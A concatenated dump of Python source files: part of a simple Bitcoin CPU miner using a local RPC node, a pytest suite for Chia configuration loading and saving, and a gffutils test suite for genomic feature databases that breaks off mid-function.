static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 23472
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from chia.util.config import create_default_chia_config, initial_config_file, load_config, save_config
from chia.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_chia_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_chia_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_chia_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_chia_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_chia_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55401
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
test.py
|
import warnings
from textwrap import dedent
from . import expected
from gffutils import example_filename, create, parser, feature
import gffutils
import gffutils.helpers as helpers
import gffutils.gffwriter as gffwriter
import gffutils.inspect as inspect
import gffutils.iterators as iterators
import sys
import os
import six
import shutil
import threading
import tempfile
from textwrap import dedent
from nose.tools import assert_raises
from six.moves import SimpleHTTPServer
if sys.version_info.major == 3:
import socketserver as SocketServer
else:
import SocketServer
import multiprocessing
import json
import tempfile
import shutil
import glob
import difflib
testdbfn_gtf = ':memory:'
testdbfn_gff = ':memory:'
fn = gffutils.example_filename('FBgn0031208.gtf')
def make_db(i):
"""
Module-level function that can be pickled across processes for
multiprocessing testing.
"""
gffutils.create_db(fn, ':memory:', _keep_tempfiles='.%s' % i)
return i
def test_update():
# check both in-memory and file-based dbs
db = create.create_db(
example_filename('FBgn0031208.gff'), ':memory:', verbose=False,
keep_order=True,
force=True)
orig_num_features = len(list(db.all_features()))
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
# no merge strategy required because we're adding a new feature
db.update([f])
x = list(db.features_of_type('testing'))
assert len(x) == 1
x = x[0]
x.keep_order = True
assert str(x) == "chr2L . testing 1 10 . + . ID=testing_feature;n=1", str(x)
# ought to be one more now . . .
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Now try updating with the same feature, but using merge_strategy="merge",
# which appends items to attributes ( n=1 --> n=1,2 )
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
f.keep_order = True
f.attributes['n'] = ['2']
db.update([f], merge_strategy='merge')
x = list(db.features_of_type('testing'))
assert len(x) == 1
# Merging does a list(set()) operation, so the order is not guaranteed.
# Fix it here for testing...
x = x[0]
x.attributes['n'].sort()
assert str(x) == "chr2L . testing 1 10 . + . ID=testing_feature;n=1,2", str(x)
# still should have the same number of features as before (still 2)
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Merging while iterating. e.g., if you're updating children with gene
# IDs.
db = create.create_db(example_filename('FBgn0031208.gff'), ':memory:',
verbose=False, force=True, keep_order=True)
def gen():
for gene in db.features_of_type('gene'):
for child in list(db.children(gene)):
# important: the FBgn0031208.gff file was designed to have some
# funky features: there are two exons without ID attributes. These
# are assigned to ids "exon_1" and "exon_2". Upon update, with
# still no ID, we then have two new features "exon_3" and "exon_4".
# To prevent this issue, we ensure that the ID attribute exists...
child.attributes['gene_id'] = [gene.id]
if 'ID' not in child.attributes:
child.attributes['ID'] = [child.id]
yield child
db.update(gen(), merge_strategy='replace')
print("\n\nafter\n\n")
for child in db.children('FBgn0031208'):
print(child.id)
assert child.attributes['gene_id'] == ['FBgn0031208'], (child, child.attributes)
num_entries = 0
for gene_recs in list(db.iter_by_parent_childs()):
# Add attribute to each gene record
rec = gene_recs[0]
rec.attributes["new"] = ["new_value"]
db.update([rec], merge_strategy='replace')
num_entries += 1
print(list(db.all_features()))
assert (num_entries > 1), "Only %d left after update" % (num_entries)
# Replace
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
f.keep_order = True
f.attributes['n'] = ['3']
db.update([f], merge_strategy='replace')
x = list(db.features_of_type('testing'))
assert len(x) == 1
assert str(x[0]) == "chr2L . testing 1 10 . + . ID=testing_feature;n=3", str(x[0])
# still should have the same number of features as before (still 2)
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Same thing, but GTF instead of GFF.
db = create.create_db(
example_filename('FBgn0031208.gtf'), ':memory:', verbose=False,
force=True, keep_order=True)
f = feature.feature_from_line('chr2L . testing 1 10 . + . gene_id "fake"; n "1"', strict=False)
f.keep_order = True
db.update([f], merge_strategy='merge')
x = list(db.features_of_type('testing'))
assert len(x) == 1
x = x[0]
x.keep_order = True
# note the trailing semicolon. That's because the db's dialect has
# ['trailing semicolon'] = True.
assert str(x) == 'chr2L . testing 1 10 . + . gene_id "fake"; n "1";', str(x)
class BaseDB(object):
"""
Generic test class. Run different versions by subclassing and overriding orig_fn.
"""
orig_fn = None
def setup(self):
def gff_id_func(f):
if 'ID' in f.attributes:
return f.attributes['ID'][0]
elif 'Name' in f.attributes:
return f.attributes['Name'][0]
else:
return '{0.featuretype}:{0.seqid}:{0.start}-{0.end}:{0.strand}'.format(f)
def gtf_id_func(f):
if f.featuretype == 'gene':
if 'gene_id' in f.attributes:
return f.attributes['gene_id'][0]
elif f.featuretype == 'transcript':
if 'transcript_id' in f.attributes:
return f.attributes['transcript_id'][0]
else:
return '{0.featuretype}:{0.seqid}:{0.start}-{0.end}:{0.strand}'.format(f)
if self.orig_fn.endswith('.gtf'): id_func = gtf_id_func
if self.orig_fn.endswith('.gff'): id_func = gff_id_func
self.db = create.create_db(
self.orig_fn,
':memory:',
id_spec=id_func,
merge_strategy='create_unique',
verbose=False,
keep_order=True
)
self.c = self.db.conn.cursor()
self.dialect = self.db.dialect
def table_test(self):
expected_tables = ['features', 'relations', 'meta', 'directives', 'autoincrements', 'duplicates', 'sqlite_stat1']
self.c.execute('select name from sqlite_master where type="table"')
observed_tables = [i[0] for i in self.c.execute('select name from sqlite_master where type="table"')]
assert set(expected_tables) == set(observed_tables), observed_tables
def _count1(self,featuretype):
"""Count using SQL"""
self.c.execute('select count() from features where featuretype = ?',(featuretype,))
results = self.c.fetchone()[0]
print('count1("%s") says: %s' % (featuretype,results))
return results
def _count2(self,featuretype):
"""Count GFF lines"""
cnt = 0
for line in open(self.orig_fn):
if line.startswith('#'):
continue
L = line.split()
if len(L) < 3:
continue
if L[2] == featuretype:
cnt += 1
print('count2("%s") says: %s' % (featuretype, cnt))
return cnt
def _count3(self,featuretype):
"""Count with the count_features_of_type method"""
results = self.db.count_features_of_type(featuretype)
print('count3("%s") says: %s' % (featuretype, results))
return results
def _count4(self,featuretype):
"""Count by iterating over all features of this type"""
cnt = 0
for i in self.db.features_of_type(featuretype):
cnt += 1
print('count4("%s") says: %s' % (featuretype,cnt))
return cnt
def featurecount_test(self):
# Right number of each featuretype, using multiple different ways of
# counting?
print('format:', self.dialect['fmt'])
expected_feature_counts = expected.expected_feature_counts[self.dialect['fmt']]
for featuretype, expected_count in expected_feature_counts.items():
rawsql_cnt = self._count1(featuretype)
fileparsed_cnt = self._count2(featuretype)
count_feature_of_type_cnt = self._count3(featuretype)
iterator_cnt = self._count4(featuretype)
print("expected count:", expected_count)
assert rawsql_cnt == count_feature_of_type_cnt == iterator_cnt == fileparsed_cnt == expected_count
def _expected_parents(self):
if self.dialect['fmt'] == 'gff3':
parents1 = expected.GFF_parent_check_level_1
parents2 = expected.GFF_parent_check_level_2
if self.dialect['fmt'] == 'gtf':
parents1 = expected.GTF_parent_check_level_1
parents2 = expected.GTF_parent_check_level_2
return parents1, parents2
def test_parents_level_1(self):
parents1, parents2 = self._expected_parents()
for child, expected_parents in parents1.items():
observed_parents = [i.id for i in self.db.parents(child, level=1)]
print('observed parents for %s:' % child, set(observed_parents))
print('expected parents for %s:' % child, set(expected_parents))
assert set(observed_parents) == set(expected_parents)
def test_parents_level_2(self):
parents1, parents2 = self._expected_parents()
for child, expected_parents in parents2.items():
observed_parents = [i.id for i in self.db.parents(child, level=2)]
print(self.db[child])
print('observed parents for %s:' % child, set(observed_parents))
print('expected parents for %s:' % child, set(expected_parents))
assert set(observed_parents) == set(expected_parents)
def test_bed12(self):
if self.__class__ == TestGFFClass:
kwargs = dict(block_featuretype='exon', thick_featuretype='CDS', name_field='ID')
if self.__class__ == TestGTFClass:
kwargs = dict(block_featuretype='exon', thick_featuretype='CDS', name_field='transcript_id')
obs = self.db.bed12('FBtr0300689', **kwargs)
exp = "chr2L 7528 9484 FBtr0300689 0 + 7679 8610 0,0,0 2 588,1292 0,664"
assert obs == exp
obs = self.db.bed12('FBtr0300690', **kwargs)
exp = "chr2L 7528 9484 FBtr0300690 0 + 7679 9276 0,0,0 3 588,397,817 0,664,1139"
assert obs == exp
class TestGFFClass(BaseDB):
orig_fn = example_filename('FBgn0031208.gff')
class TestGTFClass(BaseDB):
orig_fn = example_filename('FBgn0031208.gtf')
def test_random_chr():
"""
Test on GFF files with random chromosome events.
"""
gff_fname = gffutils.example_filename("random-chr.gff")
db = helpers.get_gff_db(gff_fname)
# Test that we can get children of only a selected type
gene_id = \
"chr1_random:165882:165969:-@chr1_random:137473:137600:-@chr1_random:97006:97527:-"
mRNAs = db.children(gene_id, featuretype="mRNA")
for mRNA_entry in mRNAs:
assert (mRNA_entry.featuretype == "mRNA"), \
"Not all entries are of type mRNA! %s" \
%(",".join([entry.featuretype for entry in mRNAs]))
print("Parsed random chromosome successfully.")
def test_gffwriter():
"""
Test GFFWriter.
"""
print("Testing GFF writer..")
fn = gffutils.example_filename("unsanitized.gff")
# Make a copy of it as temporary named file
temp_f = tempfile.NamedTemporaryFile(delete=False)
temp_fname_source = temp_f.name
shutil.copy(fn, temp_fname_source)
# Now write file in place
source_first_line = open(temp_fname_source, "r").readline().strip()
assert (not source_first_line.startswith("#GFF3")), \
"unsanitized.gff should not have a gffutils-style header."
db_in = gffutils.create_db(fn, ":memory:", keep_order=True)
# Fetch first record
rec = six.next(db_in.all_features())
##
## Write GFF file in-place test
##
print("Testing in-place writing")
gff_out = gffwriter.GFFWriter(temp_fname_source,
in_place=True,
with_header=True)
gff_out.write_rec(rec)
gff_out.close()
# Ensure that the file was written with header
rewritten = open(temp_fname_source, "r")
new_header = rewritten.readline().strip()
assert new_header.startswith("#GFF3"), \
"GFFWriter serialized files should have a #GFF3 header."
print(" - Wrote GFF file in-place successfully.")
##
## Write GFF file to new file test
##
print("Testing writing to new file")
new_file = tempfile.NamedTemporaryFile(delete=False)
gff_out = gffwriter.GFFWriter(new_file.name)
gff_out.write_rec(rec)
gff_out.close()
new_line = open(new_file.name, "r").readline().strip()
assert new_line.startswith("#GFF3"), \
"GFFWriter could not write to a new GFF file."
print(" - Wrote to new file successfully.")
# def test_attributes_modify():
# """
# Test that attributes can be modified in a GFF record.
# TODO: This test case fails?
# """
# # Test that attributes can be modified
# db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'), testdbfn_gff,
# verbose=False,
# force=True)
# gene_id = "FBgn0031208"
# gene_childs = list(db.children(gene_id))
# print("First child is not an mRNA")
# print(gene_childs[0].featuretype)
# assert str(gene_childs[0].attributes) == 'ID=FBtr0300689;Name=CG11023-RB;Parent=FBgn0031208;Dbxref=FlyBase_Annotation_IDs:CG11023-RB;score_text=Strongly Supported;score=11'
# gene_childs[0].attributes["ID"] = "Modified"
# assert str(gene_childs[0].attributes) == 'ID=Modified;Name=CG11023-RB;Parent=FBgn0031208;Dbxref=FlyBase_Annotation_IDs:CG11023-RB;score_text=Strongly Supported;score=11;ID=Modified'
# ###
# ### NOTE: Would be ideal if database checked that this
# ### change leaves "dangling" children; i.e. children
# ### GFF nodes that point to Parent that does not exist.
# ###
def test_create_db_from_iter():
"""
Test creation of FeatureDB from iterator.
"""
print("Testing creation of DB from iterator")
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
def test_sanitize_gff():
"""
Test sanitization of GFF. Should be merged with GFF cleaning
I believe unless they are intended to have different functionalities.
"""
# Get unsanitized GFF
fn = gffutils.example_filename("unsanitized.gff")
# Get its database
db = helpers.get_gff_db(fn)
# Sanitize the GFF
sanitized_recs = helpers.sanitize_gff_db(db)
# Ensure that sanitization work, meaning all
# starts must be less than or equal to stops
for rec in sanitized_recs.all_features():
assert (rec.start <= rec.stop), "Sanitization failed."
print("Sanitized GFF successfully.")
def test_region():
db_fname = gffutils.example_filename("FBgn0031208.gff")
db = gffutils.create_db(db_fname, ":memory:", keep_order=True)
def _check(item):
kwargs, expected = item
try:
obs = list(db.region(**kwargs))
assert len(obs) == expected, \
'expected %s got %s' % (expected, len(obs))
except expected:
pass
regions = [
# previously failed, see issue #45
(dict(seqid='chr2L', start=1, end=2e9, completely_within=True), 27),
(dict(region='chr2L', start=0), ValueError),
(dict(region='chr2L', end=0), ValueError),
(dict(region='chr2L', seqid=0), ValueError),
# these coords should catch everything
(dict(region="chr2L:7529-12500"), 27),
# stranded versions:
(dict(region="chr2L:7529-12500", strand='.'), 0),
(dict(region="chr2L:7529-12500", strand='+'), 21),
(dict(region="chr2L:7529-12500", strand='-'), 6),
# different ways of selecting only that last exon in the last gene:
(dict(seqid='chr2L', start=11500, featuretype='exon'), 1),
(dict(seqid='chr2L', start=9500, featuretype='exon', strand='+'), 1),
# alternative method
(dict(seqid='chr2L', start=7529, end=12500), 27),
# since default completely_within=False, this catches anything that
# falls after 7680. So it only excludes the 5'UTR, which ends at 7679.
(dict(seqid='chr2L', start=7680), 26),
# but completely_within=True will exclude the gene and mRNAs, first
# exon and the 5'UTR
(dict(seqid='chr2L', start=7680, completely_within=True), 22),
# similarly, this will *exclude* anything before 7680
(dict(seqid='chr2L', end=7680), 5),
# and also similarly, this will only get us the 5'UTR which is the only
# feature falling completely before 7680
(dict(seqid='chr2L', end=7680, completely_within=True), 1),
# and there's only features from chr2L in this file, so this catches
# everything too
(dict(region="chr2L"), 27),
# using seqid should work similarly to `region` with only chromosome
(dict(seqid='chr2L'), 27),
# nonexistent
(dict(region='nowhere'), 0),
]
for item in regions:
yield _check, item
def test_nonascii():
# smoke test (prev. version returned Unicode)
#
db = gffutils.create_db(gffutils.example_filename('nonascii'), ":memory:",
keep_order=True)
for i in db.all_features():
# this works in IPython, or using nosetests --with-doctest...
try:
print(i)
# ...but fails using plain nosetests or when using regular Python
# interpreter
except UnicodeEncodeError:
print(six.text_type(i))
def test_feature_merge():
# both "n" attribute and "source" field should be merged, since
# force_merge_fields=['source'].
gtfdata = dedent("""
chr1 a testing 1 10 . + . gene_id "fake"; n "2";
chr1 b testing 1 10 . + . gene_id "fake"; n "1";
""")
db = gffutils.create_db(gtfdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['source'], keep_order=True,
sort_attribute_values=True)
assert db.dialect['fmt'] == 'gtf'
assert len(list(db.all_features())) == 1
x = db['fake']
x.keep_order = True
x.attributes['n'].sort()
assert str(x) == 'chr1 a,b testing 1 10 . + . gene_id "fake"; n "1,2";', str(x)
gffdata = dedent("""
chr1 a testing 1 10 . + . gene_id="fake"; n="2";
chr1 b testing 1 10 . + . gene_id="fake"; n="1";
""")
db = gffutils.create_db(gffdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['source'], keep_order=True)
assert db.dialect['fmt'] == 'gff3'
assert len(list(db.all_features())) == 1
x = db['fake']
x.attributes['n'].sort()
x.keep_order = True
assert str(x) == 'chr1 a,b testing 1 10 . + . gene_id="fake"; n="1,2";', str(x)
# But when not using force_merge_fields, there should be separate entries;
# accessing fake and fake_1 should not give FeatureNotFound errors.
db = gffutils.create_db(gtfdata, ':memory:', from_string=True,
merge_strategy='merge', id_spec='gene_id',
keep_order=True)
assert len(list(db.all_features())) == 2
x = db['fake']
y = db['fake_1']
db = gffutils.create_db(gffdata, ':memory:', from_string=True,
merge_strategy='merge', id_spec='gene_id',
keep_order=True)
assert len(list(db.all_features())) == 2
x = db['fake']
y = db['fake_1']
assert_raises(ValueError, gffutils.create_db, gtfdata, ":memory:",
from_string=True, merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['start'], keep_order=True)
# test that warnings are raised because of strand and frame
with warnings.catch_warnings(record=True) as w:
gffdata = dedent("""
chr1 a testing 1 10 . + . gene_id="fake"; n="2";
chr1 a testing 1 10 . - 1 gene_id="fake"; n="1";
""")
db = gffutils.create_db(gffdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['strand', 'frame'],
keep_order=True, sort_attribute_values=True)
assert db.dialect['fmt'] == 'gff3'
assert len(list(db.all_features())) == 1
x = db['fake']
x.keep_order = True
x.attributes['n'].sort()
assert str(x) == 'chr1 a testing 1 10 . +,- .,1 gene_id="fake"; n="1,2";', str(x)
assert len(w) == 2
def test_add_relation():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'), ':memory:', keep_order=True)
L = len(list(db.children('FBgn0031208:3')))
assert L == 0, L
def func(parent, child):
child['Parent'] = child['Parent'] + [parent.id]
child['exon_parent'] = [parent.id]
return child
db.add_relation('FBgn0031208:3', 'CDS_FBgn0031208:1_737', 1, child_func=func)
L = len(list(db.children('FBgn0031208:3')))
assert L == 1, L
L = list(db.children('FBgn0031208:3'))
x = L[0]
assert 'FBgn0031208:3' in x['Parent']
assert x['exon_parent'] == ['FBgn0031208:3']
def test_create_db_from_url():
"""
Test creation of FeatureDB from URL iterator.
"""
print("Testing creation of DB from URL iterator")
# initially run SimpleHTTPServer at port 0 and os will take first available
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", 0), Handler)
port = str(httpd.socket.getsockname()[1])
print("serving at port", port)
# Serving test/data folder
served_folder = gffutils.example_filename('')
savedir = os.getcwd()
os.chdir(served_folder)
print("Starting SimpleHTTPServer in thread")
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.deamon = True
server_thread.start()
try:
url = ''.join(['http://localhost:', port, '/gff_example1.gff3'])
db = gffutils.create_db(url, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
url = ''.join(['http://localhost:', port, '/gff_example1.gff3.gz'])
db = gffutils.create_db(url, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
finally:
print('Server shutdown.')
httpd.shutdown()
server_thread.join()
os.chdir(savedir)
def test_empty_files():
fn = tempfile.NamedTemporaryFile(delete=False).name
a = open(fn, 'w')
a.close()
assert_raises(ValueError, gffutils.create_db, fn, fn + '.db')
def test_false_function():
# smoke test: before commit ce4b7671f, this would raise "TypeError: object
# of type 'function' has no len()"
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:',
keep_order=True,
id_spec=lambda x: False,
merge_strategy='create_unique'
)
def test_inspect():
file_results = inspect.inspect(gffutils.example_filename('FBgn0031208.gff'), verbose=False)
db_results = inspect.inspect(
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:'),
verbose=False
)
expected = {
'featuretype': {
'intron': 3,
'five_prime_UTR': 1,
'exon': 6,
'mRNA': 4,
'CDS': 5,
'pcr_product': 1,
'three_prime_UTR': 2,
'protein': 2,
'gene': 3,
},
'feature_count': 27,
'chrom': {
'chr2L': 27,
},
'attribute_keys': {
u'': 3,
'Dbxref': 6,
'Name': 19,
'Parent': 20,
' Parent': 1,
'score_text': 2,
'gbunit': 1,
'derived_computed_cyto': 1,
'Derives_from': 2,
'derived_molecular_weight': 2,
'score': 2,
'ID': 25,
'derived_isoelectric_point': 2,
'Ontology_term': 1,
}
}
assert file_results == db_results == expected
# file and db work because db is created from
kwargs = dict(
look_for=['chrom', 'strand', 'attribute_keys', 'featuretype'],
verbose=False,
limit=10,
)
file_results = inspect.inspect(
gffutils.example_filename('FBgn0031208.gff'),
**kwargs
)
iter_results = inspect.inspect(
